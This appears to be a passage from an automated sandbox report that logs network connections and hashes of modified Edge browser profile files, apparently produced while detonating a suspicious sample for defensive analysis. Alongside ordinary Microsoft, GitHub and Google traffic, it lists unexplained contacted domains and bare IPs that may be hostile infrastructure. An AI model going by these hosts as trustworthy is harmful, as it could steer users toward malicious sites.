| NL | 13.69.116.109:443 | eu-office.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.131:443 | login.microsoftonline.com | tcp |
| IE | 40.126.31.131:443 | login.microsoftonline.com | tcp |
| NL | 13.69.116.109:443 | eu-office.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | aadcdn.msftauth.net | udp |
| US | 8.8.8.8:53 | aadcdn.msftauth.net | udp |
| GB | 2.18.27.89:443 | aadcdn.msftauth.net | tcp |
| US | 8.8.8.8:53 | aadcdn.msauth.net | udp |
| US | 8.8.8.8:53 | aadcdn.msauth.net | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| GB | 51.132.193.105:443 | browser.events.data.microsoft.com | tcp |
| GB | 51.132.193.105:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | blockchainjoblist.com | udp |
| US | 8.8.8.8:53 | womenempowermentpakistan.com | udp |
| US | 172.65.190.172:443 | womenempowermentpakistan.com | tcp |
| US | 172.65.190.172:443 | womenempowermentpakistan.com | tcp |
| US | 8.8.8.8:53 | atnimanvilla.com | udp |
| US | 34.132.102.6:443 | atnimanvilla.com | tcp |
| US | 8.8.8.8:53 | yeuquynhnhai.com | udp |
| US | 8.8.8.8:53 | deepikarai.com | udp |
| IN | 195.35.22.167:443 | deepikarai.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | m365cdn.nel.measure.office.net | udp |
| US | 8.8.8.8:53 | m365cdn.nel.measure.office.net | udp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | udp |
| GB | 23.73.136.145:443 | m365cdn.nel.measure.office.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| CA | 51.222.39.81:443 | tcp | |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| ES | 23.62.180.208:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | m365cdn.nel.measure.office.net | udp |
| US | 8.8.8.8:53 | m365cdn.nel.measure.office.net | udp |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 149.255.35.125:443 | tcp | |
| GB | 2.18.27.76:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| DK | 84.53.172.104:443 | aefd.nelreports.net | udp |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.178.195.151:443 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| ES | 23.62.180.198:443 | www.bing.com | udp |
| US | 38.68.50.179:443 | tcp | |
| US | 8.8.8.8:53 | m365cdn.nel.measure.office.net | udp |
| US | 8.8.8.8:53 | m365cdn.nel.measure.office.net | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 23.73.139.43:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | google.co.ck | udp |
| US | 8.8.8.8:53 | google.co.ck | udp |
| NL | 142.250.153.99:80 | google.co.ck | tcp |
| NL | 142.250.153.99:80 | google.co.ck | tcp |
| US | 8.8.8.8:53 | google.co.ck | udp |
| US | 8.8.8.8:53 | google.co.ck | udp |
| NL | 142.250.153.103:443 | google.co.ck | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.153.147:443 | www.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | google.co.ck | udp |
| US | 8.8.8.8:53 | google.co.ck | udp |
| NL | 142.250.153.99:443 | google.co.ck | tcp |
| GB | 23.73.139.43:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| NL | 142.250.153.103:443 | google.co.ck | udp |
| US | 8.8.8.8:53 | www.google.co.ck | udp |
| US | 8.8.8.8:53 | www.google.co.ck | udp |
| NL | 142.250.153.94:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.153.106:443 | www.google.com | udp |
| US | 8.8.8.8:53 | dns-tunnel-check.googlezip.net | udp |
| US | 8.8.8.8:53 | tunnel.googlezip.net | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 8.8.8.8:53 | ogads-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | ogads-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | tunnel.googlezip.net | udp |
| NL | 108.177.119.95:443 | ogads-pa.clients6.google.com | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| NL | 108.177.119.95:443 | ogads-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.31.100:443 | play.google.com | tcp |
| NL | 142.251.31.100:443 | play.google.com | udp |
| US | 8.8.8.8:53 | consent.google.co.ck | udp |
| US | 8.8.8.8:53 | consent.google.co.ck | udp |
| NL | 173.194.69.102:443 | consent.google.co.ck | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| NL | 108.177.119.139:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | id.google.co.ck | udp |
| US | 8.8.8.8:53 | id.google.co.ck | udp |
| US | 8.8.8.8:53 | xpaywalletcdn.azureedge.net | udp |
| US | 8.8.8.8:53 | xpaywalletcdn.azureedge.net | udp |
| US | 13.107.246.64:443 | xpaywalletcdn.azureedge.net | tcp |
| US | 8.8.8.8:53 | id.google.co.ck | udp |
| NL | 74.125.128.94:443 | id.google.co.ck | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| ES | 23.62.180.198:443 | www.bing.com | udp |
| ES | 23.62.180.198:443 | www.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7b4da33e62f9379875c7a1c30b99c8ac |
| SHA1 | 4e6d9e6f94bc1e08ac7a82250402b2355f05c1f5 |
| SHA256 | dcc3f79e1e861d98835653dc8e556164cc5bbb213ce01e0349f1605a9c9d2021 |
| SHA512 | 6fd6bc172300fa7bb3dac9ce64fe8e9163fc97ec4c699214521fccf7d9cc16bc210ee96c11c1235424a36957cc43ab7e707963cdaebd90b6414fdfb02dc1c78a |
\??\pipe\crashpad_2864_KJWOKZQQGHEOWTPW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 52115505ea365db26dd4afb733c786db |
| SHA1 | ef9c2cb894325ea01d10c33e2675aac7670eeee0 |
| SHA256 | 9f69ef754a50370adbb876d3527a3a1cdb7a7317886671e6a9ff617abd7c714b |
| SHA512 | c3e01da0c61de354954f901ce76abe26582d1f20828dce06d03b4439852c9c575ef6bc2e7fc6a859e28cd25d70ce8017caccca08257f03458908ffa74bdbd98a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | df2d1721cd4e4eff7049314710dc7c11 |
| SHA1 | f5aed0158b2c0a00302f743841188881d811637a |
| SHA256 | ba336ffd1b01965d7ab0e5fac5415e43cb594139c76b19e4c0d9b5b3b67c1e93 |
| SHA512 | 11fd520176193f284563c7d050e6a7ab4e9895bac49fdc05759bab2c8a69f224858ccc784b351fc1d3ee5d39345430f9234623c9390978d7daf6a08ff5576ef4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | dea3f4aeabcc5d5bc52797cd2d47f5af |
| SHA1 | 76a7c59c444bd7a5408a5070696999848a2b09c3 |
| SHA256 | e976c19e8f233035f7ca055774801b5cdd99f0fe58ba681522975855ff9580eb |
| SHA512 | 6e620dfc011500655c7df04644fdf37761d47a71a9d25599da45c1924128b58e1d65eb6c5da9427d13f2401f8cf571c36543f2811859ac3960a2eb93c2115c77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 7a4094c2b4f9bae633c76c7dbe33b0f1 |
| SHA1 | b69da3ca78503dfb658dce76814cf9c2c49cacc4 |
| SHA256 | 17976219f933344f54e744ca4170953eb095d787c598c5221812981f04124150 |
| SHA512 | 9b773aecd84224319609f5b82d261e5949a84953aa122a540575997fde903c48b5f9e976beb512f42521d5d7209fa82e58dca64de578fb71a04394d28bd57c87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9c01fdadfead16e0b58abac803a3913e |
| SHA1 | dc6e56d86a8b314abe075cc05eb789125f81784b |
| SHA256 | f80f9e61d26b4d38350f2dce67b40ba4487e58f3546d360a52910ba39fbccb87 |
| SHA512 | e9ac07013e7e39dbaed96b392994016445a8697a5366eecbbf8b5cc7b6cbaaa5ce7e77d0d2f49d239109cc43a1b1ee9ce353eb7134619f349f1da5d1b557153b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 2b66d93c82a06797cdfd9df96a09e74a |
| SHA1 | 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28 |
| SHA256 | d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954 |
| SHA512 | 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
| MD5 | 35dfe5615f668fab7343cab94d31542d |
| SHA1 | 7f5c93234ca766aa84c39d37a6428c0e0d40fffe |
| SHA256 | 15809d42fef2ca0b90c68e3ebb5cfe98dad92970fbd30c4044366e39afafcbdd |
| SHA512 | 6a58661dd5be367221ea17633cb278c82b6202d595983b993fc0c97ceef137a3f3ea5cefb75c99ba9c1bf9596984a262628c1f04ba43497c12b4de7ba2d3182b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ecfe36046f50a07136db589ef4d80d29 |
| SHA1 | a640a24dd03895ac9d3a02f51a53ff9816417b8e |
| SHA256 | 0d18d8f47869ca83fb68a893cd6af1a4bebfe136be155faef31864c966e9a6d3 |
| SHA512 | 173967af0bd0416f9bceace4e59e6b59d593133c976a3ee656cb1654f844992a6b553dfe18cddf3409fe4943bbf1b263d2ae3d1fc2c73df43eb08234aa552216 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 9781f8a779d8f1913d71c360c040d385 |
| SHA1 | 52e2847c983048a988c1315a1c7d87b6a058a26d |
| SHA256 | 3258b0c7cf0e835f9f491a214e24c1548ecce6058461c63605605f1c15a84f94 |
| SHA512 | f1961c78779c4d3b7e4e0a433299a9c42c65ab6e0cc9f7fa5b2ac82e26f4acfdc344ae9b35a498c2bdf898a0e2d7c2a17ba32e6394f955d0ad38110a3d31410d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000093
| MD5 | eac038a12efd64e3040e1b653021aab1 |
| SHA1 | ec65e04d6f3bb35d1585958477388042343efc77 |
| SHA256 | 5ef751b17267f0841c426e9135327f0265c2a213b20156be440ef75ad08ae334 |
| SHA512 | 3753358b6975285d8fea6d5796faee89ac5abb34208eb6047c122b46d8275014d3d654d43232c3ab7eda02d0719829cbf8a057eb7a9ce1d94bdf36aedae59923 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | af12e0c46ac4ba4ea948920eb3213037 |
| SHA1 | 210d5ab26c4194c7b3bb57282d32d2028c5382ef |
| SHA256 | da5d6b740804c960f430cf591ddf9f961a9a9c10751ceb94d5a51e637fa97cde |
| SHA512 | 189742afc688c77754205a15f5c02ed7b35e77272b243123a8f1715de5fc8bd147c105d1013e68073146c63928dba3c60eab8177912c96b5aa898c4f4bde214a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe57ef51.TMP
| MD5 | a77534cd586825cecee2fb6f4e5cbf2a |
| SHA1 | 27451829738748a81b2a9284b5a8138797c6e48e |
| SHA256 | 3c4668462635755585a602942bff6471f147f76766800fa3d49dad5bfa97ea09 |
| SHA512 | df3495f9ea59a4a271ce2d769c9ea03415f815031d7922fb5fadfc2af49eaf7f08807ac71d6fd13a6afe8433c0da36b0e7d53c01ef1b2be43bbb127fde80a4a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 81621ec4c6240d01077f8396123d7813 |
| SHA1 | 051a13dbd28cfdd8d40b7b5b6b80ec5cc50efda0 |
| SHA256 | c17fe6b7e2b1966233978c0132ffdca1310fb8493e1401dfe91cf1ebf111f096 |
| SHA512 | 0b3d70eede7dd9844b04e86840eb2f14a908fbe667b1e5ba3822fabca2b516ef774318758e367b693644e44966577d2e5ddb0d22120303450ccf874e1633eed6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\4ddf9bd8-4fcd-46bc-934c-7de2385b9545\index-dir\the-real-index
| MD5 | 3deb924749a049be4c9ec7037606329f |
| SHA1 | 1905c8ab17227fe220852ae6a5dbe76fd126baac |
| SHA256 | 04e2695faf89cf4b1ef1c7c2688cab0de10219e98d4a3817484e4b9975b852d3 |
| SHA512 | 0b013e75d1f141e672da1fcd11673689a7d2038bf786d5bd1a6d3418d3152a5638d7d2b006013328924779825e3b1392b593e33193f3d05738cd849b818e776d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\4ddf9bd8-4fcd-46bc-934c-7de2385b9545\index-dir\the-real-index~RFe57fc23.TMP
| MD5 | 3fc0c38a4675c070cdfd6ebb965d4cc3 |
| SHA1 | a6891bb9d9dff8a248cd94a5ec7b42f70712af55 |
| SHA256 | bf115236e0f2e7eef0ac8d96124be0f317f690aee22094553bc34caa45f740f8 |
| SHA512 | 48a00c9d80d9760a2b0ca509a5942c0a0143c2c7b09e246b8507edf31790a95976b90be6b7a56f467a332784b9db44e1da108b251e51746aed00fea4d205d880 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000da
| MD5 | fc4f627ddf54943afa716e1ac1c695c3 |
| SHA1 | 5377bdb788bc19b76e5b7cb8bcb9110394bf1812 |
| SHA256 | 1c569628639cf777d2a69e37daa3c970165d1e1fc7f4518b4810b050810d0d88 |
| SHA512 | be9e9c47914d2973311e017bfd9846a7aaa88b3b90f49a45edb86aa594f32c2040aa25d1bfa927745524a7a145f2095b6f853de62d3a2118353633b990a3f2ab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cab39fbbe6dfc45097a862609a2beba6 |
| SHA1 | b7b3f506cbee6054d74c43a1f2ba3aad8359c1a8 |
| SHA256 | 4a932eb9f3fc58982d85abe5f6a7ef83518844c7e9491c0ef8f3cef70ef8eb1e |
| SHA512 | 3f660b1cc4cf5d63a6d026332710f00b2af018135637ce996d948c188ec099928b1b46b8bf427f9bc9c6de7702d96e9ecbea0919ea431475b992647dd3b15b46 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | bded6c58343f6b31dd9ab07074b5a744 |
| SHA1 | 9a8a95935533711f8fef0f53b99033599d163f50 |
| SHA256 | 4372fb9047a3fc222577008dba47c57f23ec11a9991c1f0e481b641db6fe4891 |
| SHA512 | be9b37cc25533591e4af3acae15ea1e000d82893cb11aaf42d971e55b2d57f4803f76064c6d2b3c5bfd4c96d41105d271a3b2f9fb9f2043479a09a2b529335a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\672850e0-716b-4785-b971-03b7429b7632\index-dir\temp-index
| MD5 | 98906af215175eb6abfb4294b74a4760 |
| SHA1 | af574aad113b08fc3551af059eeb21baece46a66 |
| SHA256 | 9f798737057ed5a9a907a6b7585390a49dfe47fa85e5c42ac208dacf34b40d73 |
| SHA512 | 8cb75714a8454bc287dd2a9216e3cb29ae7ed306806b9b4c3c6a29261adbe2a2ddcbc8d701db3bd7bfd32f12cedda8f47e61bd63c2fc19aaa64fc68431089986 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\672850e0-716b-4785-b971-03b7429b7632\index-dir\the-real-index~RFe581529.TMP
| MD5 | 37c9efe3e2e07dd8645ed9403c06770a |
| SHA1 | d35f97ab29e98bc24f0e74d51f6693d4dd1f25ed |
| SHA256 | 1d9e0352654f92ab698768acc22c86c6899cd99d7e573afe3a8776e7796f61b3 |
| SHA512 | b8b5d9a356923f10ad5ac8c7ee708e09ef7368e696dd7215e41b47ae48c82ff2860cd0da3ed7f77f9864a9b7f468b4a0c22848020f620a06dba0fb0a6b5305c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\99d9cfc8-60b3-40f5-86fb-3174ad33a7bc\index-dir\the-real-index
| MD5 | f10ba003d7429441a248dd7dcb8a8fd2 |
| SHA1 | 35edaf5760538e473092ef2283b5d1e76283218d |
| SHA256 | 064a6020c2558d9c9145c65a9fd3cc1112c9ecc8fedbce093a409984cb54dd9f |
| SHA512 | 7591bc76f1269ff8e1edf89959e7e3b03c95db8746564ed72711a8a5b269b492e87480e577bd021789b5a538604707bfd8cb21d744858d0ed358d7c3d59300f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\6fa6d78f-3ebf-4b4d-9d08-6a50964237ce\index-dir\the-real-index
| MD5 | 919747304a98e9d0c9c347da1398ae06 |
| SHA1 | 3bebfcd3c807196a2c66aa0ca0dc219a5e2d125c |
| SHA256 | 2ac781aede6f871278f1539937579d7a24061e1a150c2d4d9c3b9358c67647bb |
| SHA512 | f7c06a771fa941c66a61e993f70b0c522cf4016a7684a4388836d53787c2f5c6bd1d22468c44ed710e207d1bf16b56ef242125f8af88a27b8d3ac40cc6982fb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\6fa6d78f-3ebf-4b4d-9d08-6a50964237ce\index-dir\the-real-index~RFe58178a.TMP
| MD5 | d940c21ecbcced3543a13f0a2b1b6a03 |
| SHA1 | ad985d4f780fda137adc271aaa00eefbcadd204e |
| SHA256 | 0f89911bdca2309de85b92197b92786905fcc1acd6d2f1d83d91230d4cd6c208 |
| SHA512 | 4210b2d7e237f5deff5db8925a5e299d7dfea8eb3119d728afa30e5a4256080770e92a376e741225da85d243e29018a4fb494bdc30b500c099c0e4f5a82d04ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
| MD5 | ceada6308f1fd9ad2f6bdcbf2530ba78 |
| SHA1 | f0cc398b18003db82359d5a36a1371efdb437d70 |
| SHA256 | 1b1fd826ce172f7c283b1c81ee814ffafe9d2957ee9226043be65a3cd8e92ad3 |
| SHA512 | b0138e560def5802a5d537866da2aef546c3d7457e1c6da115d4bbbff8d6ec10a33a5a0f6e610da82c521fada822f2307e05c1705d1458789d1e86fe77094385 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | bf74640769733f03680961aa48a4929e |
| SHA1 | 6db8e4ed7bedcaf1087eae19fd811083f02cfbe5 |
| SHA256 | 3bb9a2a955903894825d5d03d410ff23c22eaa49d5d3e74e9ff4a4ccb409af2b |
| SHA512 | a146762475bc153c3398e47312c84a27066279c4483b7e58074ac223cd0514fa8742a6b51f31a8ca0fc4d830bd25d2568faa9b951317f3d91294f1b36ca6fcb4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 9dcde643abca552a42654748f7f9ae5d |
| SHA1 | 9929a7e0c66b89ad457c2fec896c4d7f74f91368 |
| SHA256 | 1fa0bf5de3a968211b758a7dccf482b607e3f08462d5329b104c73aef12d28cb |
| SHA512 | 6495514ccba9a78cc80e9b5f9d12020866852f2a7118b4e1bc1dacba313f137867feea61abeddc08398116955661476483d77121401b19bbf2ae547e24ec77c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58437c.TMP
| MD5 | c7c53058f654e3d99a052d78825d26bd |
| SHA1 | effdc347800cb10c13bb8ca4f85b7f03551b7651 |
| SHA256 | abb41c0f4f0316f19afbedf261280331d3f942588a4b98c45ffe96cb158c049d |
| SHA512 | 85695b28005715c83f0bc6301516d8b124fed52998afde309d6dae304dfc1e678dc9c8255c141c6ba03b1edf8a8c407148194fdb8846371d7ac4cd812435e7db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | c399abdc6a29b84fd3b452f466e7a60b |
